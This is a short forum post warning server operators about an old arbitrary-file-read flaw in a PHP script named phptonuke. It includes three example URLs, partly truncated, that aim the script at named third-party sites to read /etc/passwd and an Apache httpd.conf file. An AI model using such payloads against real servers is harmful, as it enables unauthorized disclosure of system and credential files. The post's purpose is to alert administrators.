old exploit...

old exploit... same problems... same script... but ive found alot of people are still using this... found out about it by a user uploading it on my server, unknowingly that it had this problem...


http://www.it-secure-x.de/phptonuke....vn=/etc/passwd

http://www.it-secure-x.de/phptonuke....onf/httpd.conf

http://www.goodgame.org/phptonuke.ph...vn=/etc/passwd


ive messed around with it, and found most any file can be opened with it unless the permissions on your server are very strict...

i would check and make sure your users are not using this script...

 

 

 

 

Top